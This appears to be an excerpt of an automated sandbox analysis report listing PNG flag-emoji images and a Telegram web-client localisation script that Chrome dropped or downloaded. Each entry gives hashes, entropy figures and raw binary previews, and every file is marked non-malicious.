                                  Preview:.PNG........IHDR.....................PLTEGpL...B$.{x....D%...yw.D&.}.D&.rp....{.:2.^6.J).wsvvv....G).......zu.........xt.E'xxx.....rnwww....G)..yyy...tpxxx..{.F(ttt...........rn.~rrr.?!...................................................................................................................................................}....}y.......yt.tn.oh....up.jb.d\.mg._V.to.XP.YP.XO.XO.UO.WN....d\.ZQ._V.lf.VM.WN.UK.PL.XP.SI.TK.kf.cZ....RH.SJ.PG.PG.GD.NE.cZ.VN{||.LC.qQ.J@.YR.D;.H?.KB.E<uuu.OH.D;.;6xuO.B9.C:.H?.@6S.S.C:.@6^{P.D<.=4=.T.H8.=3%.W.:1.A9*.W&.V./,.:1.[>%.U".U.<3%.U.8/#.T$.U&.T.H<".R.1*.7...V!.Q.5, .P#.Q.5+..O.3*$.P.4*.2)..N.<5..M.?9.1) .M..M..M..J .K..H..G.{H.82..C.}C.vFhQ2.{@.x@.qD.uAD^4.v=.w=.o?.t:.r:.h>.r8.n:.p7.h;.n5.b9.d6.l4.j1.]6.h0.f/.X3.b/._/.R0.Z+.U*.M-.P&.I*.F#.A!.:.(.+!....tRNS.....")28>NPTaccboosu~...................................................................................................................<1.~...BIDATx...M..D...\o..."...."..PVH\
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (18362)
                                  Category:dropped
                                  Size (bytes):18422
                                  Entropy (8bit):5.049537820821063
                                  Encrypted:false
                                  SSDEEP:192:o/kF3DWtg5I3cTKk/Q4yZOXG/lB0wKqwztTSuIdmPignIi7SdibRs1YpZNWBvYAx:oI3Dbac/TW30J/tBROZXyEW0NZuQx
                                  MD5:8957B08675A1F50A028C9CA1B63F3FFA
                                  SHA1:B49D9F9A958A83454079F356AE144591E811798E
                                  SHA-256:FD5D096F167239210AD895C0332DE2BC95585AD11A667295E97687EFDE54162A
                                  SHA-512:1668F538D174591AC9EA415E85B1301FA7E8BD4F831ECC98DEBC3F3A849702BF34F29903BD827883034EF933ADFE7A350D3F60D83F16EC71A9FCF0ECDF677AAE
                                  Malicious:false
                                  Reputation:low
                                  Preview:"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5193],{5193:(e,t,n)=>{n.r(t),n.d(t,{default:()=>a});const a={Search:"Search",SavedMessages:"Saved Messages",ArchivedChats:"Archived Chats",Contacts:"Contacts",Settings:"Settings",lng_menu_night_mode:"Night Mode",lng_settings_enable_night_theme:"Enable night mode","Appearance.Animations":"ANIMATIONS",TelegramFeatures:"Telegram Features",AccDescrOpenMenu2:"Open menu",NewMessageTitle:"New Message",NewChannel:"New Channel",NewGroup:"New Group","Common.Close":"Close",FilterAllChats:"All Chats",MarkAsUnread:"Mark as unread",UnpinFromTop:"Unpin from top","ChatList.Mute":"Mute",Archive:"Archive",Delete:"Delete",DeleteChat:"Delete and exit",FromYou:"You",formatDateSchedule:"MMM d",June:"June","Month.GenJune":"June","Month.ShortJune":"Jun",MarkAsRead:"Mark as read",PinToTop:"Pin to top","ChatList.Unmute":"Unmute","Group.LeaveGroup":"Leave Group",LeaveChannel:"Leave Channel",AttachPhoto:"Photo",UnreadMessages:"Unrea
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4824
                                  Entropy (8bit):7.921179190375871
                                  Encrypted:false
                                  SSDEEP:96:qiRvvrk65C3RYcfSJ0KPZ0vaqHoUbFw5j0PDNLjp8iHqL9wD0WbAN:qiRvvrFs3RYyfKcNbFw5ID9tTR0
                                  MD5:75C13831B3EB66B1FE55FD42E94EAA53
                                  SHA1:5A4D4C88E8C5F68065DA6E0A3FD22EA8D66F06A7
                                  SHA-256:0E8167B5DD831F290BCA4E7D9BE11AA5E8252CB823307277179E7A30900DE1F5
                                  SHA-512:4D5F72BF055895C8720FF39CFB5F9FB4DB7AD18415740D1543EE17F93273D471AC15B84B59ECDA09DDE9881ED9E8DE3A092FC9E5849B6C016EDF1F7B3AE2829E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.OX.MVj.).s|l!+.lue.%.v.f.&.v.g.&.ir.x..Ycg.'.qy.uEaG=..9i.).v~d.#.w..CNs$/.s|._/p.#.mv.z.`. m#-.lu.u~.BMk *c.#.z..irg.'.v.m#-.y..lua.!`...vD.uD.rD.+9.OV..5..7..7..0..4..,..:..0..=..3..<..B..L..C..R..Ju.Ud.WW.\.x.D.b.u~I.W.qz3.g.kv.nw.er8.]&.k.kt%.k%.j._m%.i.eo%.i..i..k#.h..l#.g.Xh-.g!.f*.]..m;.e!.eU.d..e@.d.dm..d.Xf..c.Qb..f..b.[gk.`..a.p_..a..`.M^.._._cG.^..d..^.P]..].IZ.S^..`..]&.\.XbtuZ..[.FY/.[.CX..\.@W..Z.EW.jW.DVL.W..Y.GW7.X..X.^U..X..W.AT.NZ.BT..V.;R..U.FU.>Q..T..S.@Q..T.=O.HT..R..SRvP..Q..P..P..P.:L.5K.=N.BP..Ns`L..M.=M.7J..Q..O..L..L.NH..K.5G.8I..J]dH.-E..H.9I..H.2D0xGySF.BI..F..K..F./B..E.1C..F..G.3D.7F..D..D..@.)?.3C..C6kAGbA..>.+=.3A.xE..?.$:.(:.-<[R<rE;.&8.0>.7;.$6.y:.'7..4. 4.!3.)7.-:.r6.!1.o6.*6....#0z'2.d1.T/.`/..*q%/..*v.*R/(m *w.$i.$b...#.p...4tRNS......#-2;GMOX[`mmmmrz~...............................mS...SIDATx.............H.."_Z{...-..].y.,....%.......@..).,..M..G.K#R$....0.BF..../@.....|.G..:t..C...:t..C..w....RK.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3422
                                  Entropy (8bit):7.906198132802901
                                  Encrypted:false
                                  SSDEEP:96:EcWdJWRTOCfQBMyZPo/d3t7ygzfXw2aBr:moqCfIMy6/d97x7XcF
                                  MD5:116DA5CB69963471852D96FE4A21AA8E
                                  SHA1:6B9D6FA2686D175BE83C6F9C2EFC5A11521A31EA
                                  SHA-256:CF3254BD8F3B27FFDB6831BEE3CA5A5F74C5F2C05F89C9E322F76F60AE53D5E4
                                  SHA-512:8F7E5568B6516FAEEC7700061C85E4960ACCF03C4FEF29A66F1CC1B8A8D9690F781CAE2087C3043EC842E0642B7E0C884B50B8D938C9A5F95BE0D68B5106866F
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLmXS...nii.r\..f.....;2".sw...b.}.....Q'".kpl.|.rw....F$..4...<D...Z.u.qv.F$...e.!.T).jB.sw.G%...c.~...<~[a...F#.rvc.~.ej....H&....F$c.~.J)...c. .txw'-.F%c.~...f.#...L.i`.|.mqa.....6zW.P-...............................................................................................................................................d...uz....^g].y....mr.\d.djN.rS.p.fk0.f.ag.Y`D.i/.e:.g.S[.Y`C.f.PW0._.IQ(.].BL>.`.RX.@K.MT..[.?I..U.GO..T.>H.AJ..T..U.<G..R.;E.:D..Q.CK(.T..P..O.8B.<E..N.3?..O..M.6A.FK.2>..L.5?..J.5?..J.:B..J.5?.2=..I..H.5?.1;..H..I..F.1<)vN.=D.0:..E..E.5=./9./:.-7..D.-7..C..B..C.+5..A./8..A.+5.*4..@.yB.*4.~?.29.(2.7=.}?.uB.(2.&1.|= kD.{=.&/.(1.z<.&/.%..$..$..x;.$..$-.v:./5.*2..5.m:.r7.#-.f6.j4.'..!).`3w&,.a/.[0..%.W)j.%.S)s.!.K(.L&d...F#.C!]...E.....@tRNS......%%1479EDIRW_aacfgihqw}|~.....................................1....IDATx....n.6...D.V..s.l..}..4..vX.....{...>..k....(.bI.7qd..s......i...}.e...I.6SSSSSSSSSSSSSSSSSS....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6383
                                  Entropy (8bit):7.947348926547583
                                  Encrypted:false
                                  SSDEEP:96:YZkZAntEOaPPxF+cP5JVZ1OBImceN9eBXAI1Lea6haUl54KmRDXsQEzSFaei3FEO:YZkZFPHJXLehM6hX54zFXEzei3ChcN
                                  MD5:6F6DA5C8B9B77CD1139F499F6039313A
                                  SHA1:1826DAE35CE7105657491C0E21863FB5DAAE958D
                                  SHA-256:6AC0E4216C48BABD2B61794238F839F031C05704D2DA403338A37D4986349277
                                  SHA-512:7F1DBCD883A9BF163CB9C683B51D33FE590CFB445FAB4D78BC830B630D0BAF62445284555A7A1516969625E710428BD50206D69E90B14A46C308F835DC4D591E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1fa.png
                                  Preview:.PNG........IHDR.....................PLTEGpLq~..!H...$(Lxu...B.....Dgw.."H.]ifw.....C`q../_.ny..D..@ct......G....t~....KZgx.. E`p...ct..q}..C......j{.`p...E.jujz...<..Dl}.^o...C.U_......>T..ny..................................................................................................w........y..iz.......kzy......Wkp...]l.I^f}..Qb.M].3FXs..=R.DW.?S.4K.2J./F.6N.,D.8J.ES..2.%>.(@.,D.'?.%=..8.#;.,A..3..3..6..-.+@.....1..3..,..)&K.%K...'%J.a3j%J.$I..&<%I....#H...."G...%!E. D..D..C.....B.....?.....=..<..?.....7o.8..6~.5j.5|.4z.2d.2i.2z.2.....1x.0w.._..u.,Z.,s.,{.+g.+p.*q.)TY.).)o.(m.'`.&M.&w.&l.%l.%i.#V."p.#i."c. I..k. \..T..C..e..J..>..H..`..A..:..V..BQi.3Fo.?}[m._q.Gb.iz.5N.*K..bnEZ.9T.cu....:z./p.9s.......We....6x.2vD]..5r#B.2S.Ob....<Z.!=v,N.Ug.,H.%H...../u......:..-q...@..8....#F........4tRNS.....#"$02EHJRX^cdivv}~.~~...........................^#....jIDATx^..IO*A...KB...H...J..!j.D...'z.....y.N...V...y.{Q.7U.....1..c.1..c.%$!..*(..e).G.dE....*.`}..*~.S........Yp..L.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5522
                                  Entropy (8bit):7.89732042805329
                                  Encrypted:false
                                  SSDEEP:96:SvpkZ991yyfbiqhvPZ5O5aJKQ/42GeJIeuiK2ZaL0v3MSdum4FQuejXAa+c:Sva9Vf28PZOaJKQ/42GQSO6zQuXUjXAo
                                  MD5:C7C4FD0341DC050CB815C064C5C54989
                                  SHA1:7CC1F084EB9F4EDA385675A35ACB8DAA38523657
                                  SHA-256:65F564B75A4392406456D621FF8642343845D900B53BB61FC03B613A0685BD1B
                                  SHA-512:FCD99803639182DFCA1C0FEAB498A90ACB849EF16C2C7C43BFA2CD8DF7593759C51EB40988F867623148CDADBF22046680C19066F62D0600D47B29C27F9A6789
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpLHd2o.a.._%H...k;R...^z.y4P...M H..|.{.y......nc."J...Jv.t+H..z.........Y{.y H.tg.$M"y.w..Z!J y.w.G.|.z..]vh.!I..._v.v}.{&N$.@.>M...Y.C.od...2.. ........!..... ..%..&..&.....%..$..$.....#.....".. ...........(...................................)......................................*............................!......1......../...............A.....X.........../........F..S....4......A.....G..,.....0.....=......|.z..b........-w.u...n.Ap.ni.f...q.o...k.ga.^c.ag.6Y.Vi.h...W.K[.XS.O`.\...M.IP.LM.IL.H_.,N.IL.HQ.NV.RK.GZ.`...K.FI.EH.DH.C?.LI.EF.A.z.M.I>.GD.?7.NB.?.u.@.;K.,D.V2.L@.<.p.A.?2.D<.8>.;9.5xj.>}:-.A<y6..75|1qd.'~?8v36q3!x8f\.-r,4j0)i)0c,UN."b%*\''V%KD.&P$.K..D.:5..=.)&.!!...........................................................~w.....tRNS.....(,8<CWXabccgik|}~~...............................................................................................................................M......IDATx...{.\.}...y.{.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4520
                                  Entropy (8bit):7.90114454554436
                                  Encrypted:false
                                  SSDEEP:96:SMQRJKNgXPpNL+G10pNkOLzgmHm2pfYgWGYe6UJVe42XMUzMrgWqc:kGgxQU0pHPx3YgW+VJgFFMrgxc
                                  MD5:6522886EFFF653DC7BD775C00C8B7998
                                  SHA1:5F2D212C88383B337C45C1C51BA181B45C0B13B6
                                  SHA-256:39C283F169F90F1FEE264F866BDB120A4E7137D72F99D4DD3E410E5F1A60AF37
                                  SHA-512:CACCE06A43570883C56A3FB758C45065091E069EE2CFAD90787C3EB2E5E1A568B69374207630D6118F41C4917FEF5525E98A4C6F1130A44666B39C5B5563B38A
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLo.F..7h.xwj.p.mzm.h.yoj.lk.i.x..Sj.y.r..d1pc..S)b.ryk..~...#f.v..Ord..E.l.|.r.e.u.s.tg...Zl.|vh..t.e.u"N.g.x~p.n.}.s.\.psf..t...A..*..)..*..(..)..-..,..+..+.....(..+..)..(..*..%..$.....#..(..".. ..%...........&.................$..............%.....(.....2...........$..............#..........3......$....7.......!...2.2....!.....A... ....4..R...................4..-....|7...x.>........"....<.n7l.{.........f.wk.9...].pb.r.[9S.j...^.nI.cR.g......?.[Q.3U.fD.].}..~..z.6.TJ.M`.KH.^|uI.D=.y...P1.Q.aE..O+.N.w.;.U+.MH.]*.M.JA,.N).L/.O).K.t..7=:.S'.J'.I.q...K%.H.5<:.R.,:#.F.'9$.F{m../;!.D..R..H!.C..P..B..Awi...K..?&.A,.I..=.#=".<..Oqd...;..:..8..:..F.~9.|:..6..4..=.~4.x8.|3/p..~A.|1.z1.{/.v1.y..x-.o4.v+.u+.t*@\..t8.s(.r'.q'.d1.o'.g).](.U&.L!.B.........tRNS.....%'78KMacccerwx~...........................................................................................................................cph....IDATx...].\g.....q.sfv7...i.+
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4839
                                  Entropy (8bit):7.920204709853416
                                  Encrypted:false
                                  SSDEEP:96:T4ozoyuNruNkENKpK0kHCMiVqUaCHlQ58eK+v0XgNb:Uoky8rlEW+iVqBOlQyeKk0wJ
                                  MD5:9224930251CEC04977AABF4087010597
                                  SHA1:36748C791A25774B67E31DD8E480648246DBC85D
                                  SHA-256:A162B2802DD1EF1F3228C18444D2F9D118D0D8A494AA7105ECD18A5B68090ADE
                                  SHA-512:7C5BC3DBD002D63DE79B23D6E58DC03268E2B61DC5BE68D93100476675FAA28DCCE90F67FA7B0A3C9C4A6A9B119B63D09889AD64ED02F8CCCB62E8EDCBB1D4C8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLq5'.ff[.[`.....e.e.3..hh~..~...]].6.Z.Z....ii_.b.5..JJ....aa.;.k.e.6..aa~...llf.f.4.HsH....ZZf.f....5..jkd.d....7..ii...d.d.[[y..[uPHb).................%...........%.................!...........'.....K.....*..........2.......~..H....jk..&.ff.bb.. .[[.ijf.c.TT.\\.LL...mm..CC\.\i.(.RRvvI.9:.l..AAxx ..5.FFS.SI.I.JF.11lkI.**.&&.a7.&&.@@.%%no..%%D|D.##.KV.64....%%.$$%.<.!!WW..."."".##Ur"....57...As@.##ge.4z4.......()......dUM....>X..!...]].-r-.. ...HH.....(3... u vI!...-k-.1,..... .......w.....r....bDS.........TR..p...(GU$..........m.-_(|.P....k.....f...........n.....j.......MI.w1'.h.....g.....e..a........d..........11.}$$.b......*....`.Y4....:D..X.._..^....?6C.\.....[.e%#.Z.....Q..X.....W..I....t.+.V..T.17..O.....F.9*.....?..J.....D.P...:.x...<..'..9..4..0..>".....tRNS.....)257<NSRWcffjo|~~........................E@|....hIDATx....K.q....M.i.x&.DBB....FXB.&...C`..1.9%....I.....l.u...{.66.Av...`.....G.3kcX.....|}.D".H$..D".H$..D..R..j.E.$..K
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4592
                                  Entropy (8bit):7.8482326836815774
                                  Encrypted:false
                                  SSDEEP:96:kHteUSks8gnawLpK4FDhzQkmL7wX1JvgiosHE4Bc39V8m:XkmjI4FDhEkmL78JTPECc39Vv
                                  MD5:08BAD8A9152A6FB637643A0FE954A404
                                  SHA1:C11191EFA662724481220404D7498167C6FEC07E
                                  SHA-256:874ED5BC615159B1EB4D306686FF91E9C8A289DF0E5D126F30265762852EE9A7
                                  SHA-512:91806E48AD92D4D1EE39AD3E88900CB515B3C8B97D370E08841F6A620B41638B1758D5DCE9560A62F09DFCEAB073CDE92304BFC50FDAC792EFDFAD8C07808DDA
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f5.png
                                  Preview:.PNG........IHDR.....................PLTEGpL......................................................................................................................................................................................................................*O.0S....k...A.d~.................|||{{{vvvtttuuussstttsssuuuwwwwww...~~~|||uuuyyyuuurrrxxx......................................................................................xxx~~~.....................|||......................................................................................................\v..;.Qn......Ws......&J..?..C..D. E.!F."G.#H.#I.$I.$J.%J.%K.&K.&K.&J.%J..C..E.Ih...............9Z................Aa.t............&K.~.............................................qqq............................................di......tRNS.~........................................................................................udT>.....,. .G(!......sOd?......1[........4Da.r.P&....................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4865
                                  Entropy (8bit):7.912712696791235
                                  Encrypted:false
                                  SSDEEP:96:gLoUvMZdkWf7jiNk32pDpn2AuBAEeZzkzBk6lKaIBcbgyAGO7RslfHc:+VvsTiK32BJPzkzBk6ka/jO9GPc
                                  MD5:49DAD876BE13DE6BF3644677917DC079
                                  SHA1:B601FD50E5C36ED104EFEF512A9AFF53D02901CA
                                  SHA-256:B054401B855681CFBBB74A5BCD730589EF764004E893AEDE15838B5B3467BAB9
                                  SHA-512:6EB15AF695951A6500063437A079A5EBE58304FA1160F20CC143F9728D2D085D1C7F1B154C9DB8C10ED2C20330B449B2DD76C6B0F585D7E623B97DEAB86DC86E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.<Cv...els...\dr...gnq..r...gn.<Dq...`gv....!....jqz..k..._ft.......(r...elr...<C.ip.U].ekr...jqp...`gs...kru.../8.fmm...\c.jq.fm.ah._g.Zb.T^.NX..$.W_.GR.QZ.HR#.%.@L.QY$.%.GR%.%.9F..#..$.KT.@L%.%.DN.8E%.$.%8.2@..#.&6$.%.EN. 6.7D.-;.@J.&6.#4"."./=.&6..".&6.&6.&5.(7..6.6B.%5.$4.%5..4.#3.#3.6@.#3.$3..".!1.!1.!1. 0.#2.*7#.%../..:../..3.#2....7@.....-..#.....,..4..,..,..*..+.!/.)4.&2..)..-..).."..(..(..'..,..3..&..(..&..%..%..%..$..*.}"..#..0..*..#..".u#.(2..!..!..'.. ..#..#..... ........,....k$..#..*$c%..2..........."...............'\%........(.....".&-.d"..............-..$.........'S%.........3K&Q;).......["..!..!...]2)........,t%,........................?='.......P#.......G$...`").........$@%}........D+(05&...x.........4!}..t........D.$n.....v..n.."$$h..5.3t...*tRNS.....%-8=KNUV[_ccehhvy~...................3`QA....IDATx....K.q......!..D$.e.X./...A......A..C..I%.Dp0<|.R............y...3.m...;.:......J~Y.m....?........h4..F..h4..F..nK...F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5184
                                  Entropy (8bit):7.921857394453866
                                  Encrypted:false
                                  SSDEEP:96:9yrtvjmW48GiAMEr8qChlrAayh2yauuvpYigfHsPkqAIu3JirKH9W0+JX5jF:9yrt7RVAfr85hlUa02r9YfMPkqAIu3Ju
                                  MD5:03D784BA7763B92921BAA8533BB8879F
                                  SHA1:7126AB6E30B7538F72A2FED04808FC5AFF4EBB19
                                  SHA-256:D6DA4D72EC969D8507C7DF76D7CFD8269378BC2955278C329B43ABD1F1B49E6C
                                  SHA-512:729C26B2B32BF22E2B8DF9B8612D06FBA45A31FE122AF432600B36BEA0FF1F024E35E7994210074306FADCDC6A1A37FE9CE98B27D2ADA5036A9C354FF71CC141
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL%5`ap...G\m...Hgx...J..KYl.....-fjy...Jh.._o...Jv...(4eu.aq...Jjz.. LM].ds...Ljz...I`p...L`p.k{.. M]n...Chy..$R.?L.................................................................................................................................................................................................x....{...hvo...Xfb{.jz.ev..M__q..EVTo.]n..1;Xl..2?Xi.Rh..4I.2FFe.Rd.Kd..9MLb...C.,AC^.G]..*>.<i.(<.5J=Y.BX..%9.+;.#86U.LP{.!68R...3_@~..-0P.0O...07N...,2L......"*L...,&J.1H...*..&%I..&8..3%H.)G...)$G."G..J.#F...)..'.L.!D."D...'..!..%&C."B..B.-?{..%..4.@...$.?.u K.?.....>...!.=.....<..;... .:..9..9.....8..7....O!V.5u.5.....4..4}.4..3.....1r.1..1.z.../...y..h....-.v...+o.+~.+..*f.*..)].)~f...'p.'{.&U.%y.#..#x.#u."Q.!h.!^..{..s..K..Q..t..Z..I..m..B76.....'tRNS....%,9CSUccegiv{~.....................A.N....IDATx....o\.y......rI.nd...eK.b.N.#...-..H..(..E./.X.{.....A..Ha....(.$u.'...$..X..J.E.$.z.s9.Y..ro$%.i............r.,....y&
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4141
                                  Entropy (8bit):7.911476872865669
                                  Encrypted:false
                                  SSDEEP:96:c/pPUsQuQGcfT91MLsb/G9EMlrwXYZGI4Ezmk:Mrjdcf7kTX5wIZGI4kh
                                  MD5:1AE48224BD5C58AA86982F8E632FDF31
                                  SHA1:27FFEF758CD696A95738CB8AE664A9DA4B9E0624
                                  SHA-256:1C2BC0D8512173316C3D69B69C80F22107019B77D285523EAD220E69E4941923
                                  SHA-512:F4179AA8ADAB224FB6CA9C83528EC801F403DCF82CF8E542357F3D0EFEAD6D8D37DCE488BB63D40FD2DF4A9797EE49EE7938E3F645D44BBDAB7ED0032AD3D083
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.cj....bj.......nv....mu....CM.ow....... -.......Za.jr......IIIv......&1.lt....CK.ow....el....qy....ip....jr....rz.SZ....dl....<E....................................................................................................................................................................................................x........f.....{...U.........w..p{.jvA.v.qy...6.n.mu.ir.bl.We.dn).e.]g.dl._h.Wbxxx .^.Yb.]e.P].S_.KX.Xa..U.ES.IV.MX.Q[.>Njjj.KU.?M..K.CO.8H.4E.4D.3D.3D.2B.3C.8F.DO.0B..C.>J.0@..?.2B.->.6D..9.+<.,<[[[.):.5B.+;.'8.0>.&6. 2.$5.#3.'6.!2.*8QQQ..0../....!0..)..9..,."1..-..+..)..)III."/..%..'..*."...&..#..$.....*.. ...???........&............~..333...w.....&&&%%%###""" .........................................................v9.....,tRNS... !17CGSU`ccccjstx~~~~.....................c.m....IDATx...o..}..2...."DQU,9.-..(..:v. -R#/}*.....}/.....>.(P...G.E..N..N.D.....S.EZ".:;3._87,....~...gv..{>...;gG.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5203
                                  Entropy (8bit):7.8418630989171865
                                  Encrypted:false
                                  SSDEEP:96:DZvK+9IPliZKhsmd5drPkSZpv9wEkqQfmcSWM4j+w4OQ9rh2:Dk0SiTMdrPkm2EvWS6iw4OQf2
                                  MD5:7E55842D9DEF6DFBF6071EF9AF282C2D
                                  SHA1:2D360500117550C17A795162BF5387BD68BCFD79
                                  SHA-256:BA27A787EEDA853DA0B4081C90BB2CE3A7682AD1BA29ABB422B9229BE7AB3C1C
                                  SHA-512:3DEB9617E8BC8D54FE3208C78800FB74058DD0B17122523B8407820D0B8F384B73DE7F9B74D0B9790805262BD2C0A168BD4368872519496D14AE9CDDF81A5D03
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ff-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..y.{.{.|..x.z.}u.xp.tj.qe.k^.eW.`P.[K7.o'x\.~gB.oM.uZ.}d..`..`..s.|.}u..w.yrX{q;scO}p.9).G:}{|}}}...`c}(5.".w +o$0~'5.)7.+:.-<..=./>.$3. ...*..'..$.. |..x..w..r.._..M..B..C.!E..M..Q.![.%d.'n.*}..lHS.ak.w..................................................................xk... ..1!.4#.5%.9(.=-.B1.H7.L<.N=.SB.WF.XG.C0.......{..:'...+..UF.j_._R.YL.NA.C3.B4.>1.7,.<1.SG.[P.cX.kb.sk.zr.wo.vn.rk..M..L..L. D..E71R..M..N..L..I.#`_..d.~........................6..(.lQ.oU.fP.]H.\I._L.C1.;*.9).:*.9).=,.D1.M8.U=.\@.bH.fL.hJ.jM.mO.oQ.qT.tW.wZ.y[.{].}_..a..c..d..f..g..i..k!.l".m$.o%.p&.q.._.{[C.~Q..3.v.............s..d..........vX....&.............".(.%.".....?.}lj.H.ueA.Q.k\g.0.................y..i..f..n.}c..:)gQ.J8.5(.[D.#...........................tRNS...a...................2Bp...............................................................................................c.........xgF,....a7`b1............c.}.h.............
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4259
                                  Entropy (8bit):7.935066175922985
                                  Encrypted:false
                                  SSDEEP:96:mO/AKTMhjlFU/SoSqHArjdM4OZxK6HNekkDXzhqHA6kEmfX0XscTf:mO/y5U/ZAdvOlpkDDhqRkEmfQsq
                                  MD5:E92468B68A0F8C1E6F11C0B05F9E9E28
                                  SHA1:5E0E3EE5F0FC748B9940E9F860104DDDC4A90FF0
                                  SHA-256:8D2AEE59787A113845F8B2F0D48CB8AEF2F28817FD54126FEFB4E2899406AE90
                                  SHA-512:54C37A69118EDC56508A0B8358E7C168D8FF2DE399A0194CBA1FA8F4BD626601C7A5AD0F17CB44105A51314C3D84F9EA2ACCD6497B66B0E07F10A88A2B676678
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.di.7&.ck.;'.nu.;'.:'.ck..#..,.R7.lq..:.:%.y...$v...=%t...hp.64.pw.;'.ks.Ya.;(.rz.ip.5!.fn.A-.px.rz.=).dl.3 .ow.=G..:..:..9..6..5..5..7..8..+..-..7..5..'..3..2..0..#.....-..,.....#..+..*..(..'..#..%..6..#.....!.. ........:.7.!."...........%.8......<...4...%.....%.'.....(.6....A..%.....,.#..".q3..#.owp.I....hp.bk..+.[f.\0.bj.R@r.%.T`.|..[dQ.N.w,.MZ.Zb.w..Q\.FT.P&.S\.KVQ.7.>L:.S.>L.KU.BOwj).7G.U..4D.3D.3C.>%.0A.?K&.Z.1A%.Z..?.6D%~Y#~X.)E$}X.,="|Vk^+.+;"{U7v5Fo+.,;.yS.(9.!F.xR.2@.vP.x\.%6.+7.tO.$5..? pM`V)."2.rL.*8.&2.pJ.s^..0.jJ. 0.!/.mH./6..-..9."1.fG.kE.nU..+.gD.iD..).gA.bC."...)..'.^BOH(.e?.....%.c=.\=.Y=..".`;._G..*.^9.....%.U9.]7.R8.[6.....(.Z5.X4?:'.L4..".S3....G0.M/....C..F*0.&z...>).A't..u...=$.:$%%%r...6 .2...$..#..#.."AC.....'tRNS...%*8ASTcccfgg~~~~~..........................+IDATx..Y.d.].....t..=..C.N,...;..QBDLl .,.`.%F......HH 9O...%..!.4...-.....`..Ld..c.g..{..n-...Zf.h?......_.~...J.nV.X.b.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4831
                                  Entropy (8bit):7.84776983581594
                                  Encrypted:false
                                  SSDEEP:96:uMQAkSGgVNKtdh8ZU3C5MU8qo7pYLBLex+jBr5ItNs96FalOfEMO1auM5E2:QTSZfOyU3C5OlEBqxEN5+i6Fa8EfM5H
                                  MD5:16DC194741F0582C536D9FDCE7C11404
                                  SHA1:0A85ED96E95012F293FD1B15A0F50AA19E3FAE0A
                                  SHA-256:F51B0DFBBAE120FCC2BF1E97614797D377CC718C9405D4ED0036590D440B2AF7
                                  SHA-512:B776959A6FFBBF8747C661E8BFC28D3F4A595645F1B676832FF353FA17557CC433C60BFE0F84E222F2C40111F658EA3901F18CE623B4BF707AD333DC3C4300CC
                                  Malicious:false
                                  Reputation:low
